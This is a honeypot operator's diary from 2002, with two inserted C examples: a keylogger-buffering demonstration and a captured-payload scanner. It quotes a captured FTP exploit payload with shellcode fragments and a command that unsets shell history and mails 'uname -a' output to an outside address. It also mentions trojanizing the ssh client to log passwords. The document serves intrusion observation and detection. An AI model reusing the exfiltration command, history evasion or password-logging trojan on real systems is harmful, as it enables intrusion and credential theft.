Unknown1

At this moment (July 31, 2002) my third honeypot has been running for some days. It's changed somewhat. First it was equipped with a 40GB hard drive, now it only has 4GB. First it had a 3Com ISA network card, now it has a cheap-ass PCI thingy. The latter 'upgrade' was because I couldn't get Red Hat 7.1 stable with the 3Com card. I have to admit I really didn't try hard though.


Not only the hardware and OS have changed. I hacked up the keylogger because it didn't work well. The first problem I encountered was that the logger didn't flush the output file; when the kiddos logged out, the buffered output was never written to disk. The second problem was that it crashed. The new version seems to work better, although it still has to be tested out 'in the field'. Not only did I fix the logger, I also trojanized 'ssh', the SSH client. It now logs passwords to a 'hidden' file. Can come in handy :)
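The flush bug is easy to reproduce. What follows is an added example, not the honeypot's own keylogger code: a small C program that records a constructed set of keystrokes with three logger variants (plain stdio buffering, fflush() after every record, and write(2) on an O_APPEND descriptor) from a child process that ends with _exit(), the way a logger dies when the session is torn down or the process is killed. The sample keystrokes and the /tmp paths are assumptions.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed sample keystrokes; a real logger would read these from the pty. */
static const char *const SAMPLE[] = { "uname -a\n", "unset HISTFILE\n", "id\n" };
#define NSAMPLE (sizeof SAMPLE / sizeof SAMPLE[0])

enum mode { BUFFERED = 0, FFLUSH_EACH = 1, DIRECT_WRITE = 2 };

/* Size of a file on disk, 0 if it does not exist. */
static long bytes_on_disk(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : 0;
}

/* Total bytes the logger was asked to record. */
long bytes_expected(void) {
    long n = 0;
    for (size_t i = 0; i < NSAMPLE; i++) n += (long)strlen(SAMPLE[i]);
    return n;
}

/* write(2) loop that survives partial writes; O_APPEND keeps records whole
 * even if several logger processes share the file. */
static int write_all(int fd, const char *p, size_t n) {
    while (n > 0) {
        ssize_t w = write(fd, p, n);
        if (w < 0) return -1;
        p += w;
        n -= (size_t)w;
    }
    return 0;
}

/* The child records the sample and then dies abruptly. _exit() runs no exit
 * handlers and does not flush stdio, so whatever was only buffered is lost. */
static void child_log(const char *path, enum mode m) {
    if (m == DIRECT_WRITE) {
        int fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0600);
        if (fd < 0) _exit(1);
        for (size_t i = 0; i < NSAMPLE; i++)
            write_all(fd, SAMPLE[i], strlen(SAMPLE[i]));
        _exit(0);
    }
    FILE *fp = fopen(path, "a");          /* fully buffered on a regular file */
    if (!fp) _exit(1);
    for (size_t i = 0; i < NSAMPLE; i++) {
        fputs(SAMPLE[i], fp);
        if (m == FFLUSH_EACH) fflush(fp); /* hand the record to the kernel now */
    }
    _exit(0);                             /* the bug: buffer dies with the process */
}

/* Run one logger variant in a child and report how many bytes reached disk. */
long bytes_logged(const char *path, enum mode m) {
    unlink(path);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) child_log(path, m);
    int status;
    waitpid(pid, &status, 0);
    long n = bytes_on_disk(path);
    unlink(path);
    return n;
}

int main(void) {
    long want = bytes_expected();
    printf("buffered:    %ld of %ld bytes\n", bytes_logged("/tmp/hp_buf.log", BUFFERED), want);
    printf("fflush each: %ld of %ld bytes\n", bytes_logged("/tmp/hp_flush.log", FFLUSH_EACH), want);
    printf("write(2):    %ld of %ld bytes\n", bytes_logged("/tmp/hp_write.log", DIRECT_WRITE), want);
    return 0;
}
```

Only the buffered variant loses the session: on a regular file stdio does not write anything until its buffer (a few kilobytes) fills, so a short session never reaches the disk before the logger dies. fflush() and write(2) both get the bytes into the kernel, which is enough for a crash or kill of the logger itself; if the honeypot may lose power, add fsync() as well, since a kernel-side buffer is still not on the platter.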

On Sunday Aug 11th, at 12:20 CEST, somebody connected to port 21 and sent some stuff down the pipe. This stuff included:

3F3jT'=Rh/D=XjTj(XjXRhn/shh//biRSunset HISTFILE;uname -a | mail xrecmsg@hotmail.com; mail xrecmsg@hotmail.com;exit

Now let's wait and see if someone checks his mail regularly.
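A quick way to triage a capture like the one above, as an added example that is not part of the original page: a C scanner that checks a payload for the two push immediates ("n/sh", "//bi") that build "/bin/sh" on the stack, for the "unset HISTFILE" history evasion, and for a mail command carrying an address, and that recovers the ';'-separated command tail. The bytes between those fragments were mangled on the page, so the constructed sample uses placeholder bytes around the fragments quoted there; the anchor keyword list is an assumption.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed capture modelled on the port-21 payload. The \x90 bytes stand in
 * for the mangled exploit bytes; only the fragments quoted on the page are real. */
static const unsigned char SAMPLE[] =
    "\x90\x90\x90\x90"
    "hn/shh//bi"   /* push "n/sh", push "//bi": "//bin/sh" ends up on the stack */
    "RS"           /* the two bytes that precede the command on the page */
    "unset HISTFILE;uname -a | mail xrecmsg@hotmail.com; mail xrecmsg@hotmail.com;exit";

/* Constructed benign FTP login, to show the scanner stays quiet on normal traffic. */
static const unsigned char BENIGN[] = "USER anonymous\r\nPASS x@y.example\r\nQUIT\r\n";

struct verdict {
    int shell_string;     /* "/bin/sh", contiguous or as push immediates */
    int histfile_evasion; /* "unset HISTFILE" */
    int mail_exfil;       /* a "mail" command with an @ address */
    int n_commands;       /* ';'-separated commands in the recovered tail */
    char tail[256];       /* recovered command tail, printable bytes only */
};

/* Portable memmem: find an ASCII needle in a binary buffer. */
static const unsigned char *find_bytes(const unsigned char *hay, size_t n, const char *needle) {
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0) return hay + i;
    return NULL;
}

struct verdict scan_payload(const unsigned char *buf, size_t n) {
    struct verdict v;
    memset(&v, 0, sizeof v);

    if (find_bytes(buf, n, "/bin/sh") ||
        (find_bytes(buf, n, "//bi") && find_bytes(buf, n, "n/sh")))
        v.shell_string = 1;
    if (find_bytes(buf, n, "unset HISTFILE")) v.histfile_evasion = 1;

    /* Anchor the command tail at the earliest post-exploit keyword (assumed list). */
    static const char *const anchors[] = { "unset HISTFILE", "uname -a", "export ", "wget ", "cd /tmp" };
    const unsigned char *start = NULL;
    for (size_t i = 0; i < sizeof anchors / sizeof anchors[0]; i++) {
        const unsigned char *p = find_bytes(buf, n, anchors[i]);
        if (p && (!start || p < start)) start = p;
    }
    if (!start) return v;

    /* Copy the printable run from the anchor to the end of the command tail. */
    size_t len = 0;
    for (const unsigned char *q = start; q < buf + n && isprint(*q) && len + 1 < sizeof v.tail; q++)
        v.tail[len++] = (char)*q;
    v.tail[len] = '\0';

    /* Count non-empty ';'-separated commands. */
    int seg = 0;
    for (size_t i = 0; i < len; i++) {
        if (v.tail[i] == ';') { if (seg) v.n_commands++; seg = 0; }
        else seg++;
    }
    if (seg) v.n_commands++;

    const char *m = strstr(v.tail, "mail ");
    if (m && strchr(m, '@')) v.mail_exfil = 1;
    return v;
}

static void report(const char *name, const unsigned char *buf, size_t n) {
    struct verdict v = scan_payload(buf, n);
    printf("%s: shell=%d histfile=%d mail=%d commands=%d tail=\"%s\"\n",
           name, v.shell_string, v.histfile_evasion, v.mail_exfil, v.n_commands, v.tail);
}

int main(void) {
    report("sample", SAMPLE, sizeof SAMPLE - 1);
    report("benign", BENIGN, sizeof BENIGN - 1);
    return 0;
}
```

The anchor list is what makes this usable on a tail that starts right after non-printable shellcode: without it, the two printable bytes before "unset" would be swept into the command string. Extend the anchors with whatever your captures show, and treat any hit on the shell string plus an external mail address as worth a look at the mailbox owner rather than just the exploit.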


Well, somebody did check his mail. The guy rootkitted my system and began scanning for vulnerable ftpd's right away. His rootkit broke 'ls' and 'find', which both segfaulted without giving any useful output. This would immediately arouse suspicion in any sysadmin, but this unknown kiddo didn't even notice it. Combined with the scanning he did, I disconnected the system almost immediately after the hack. He didn't do anything interesting with the system, so I never looked into it. Next time I will.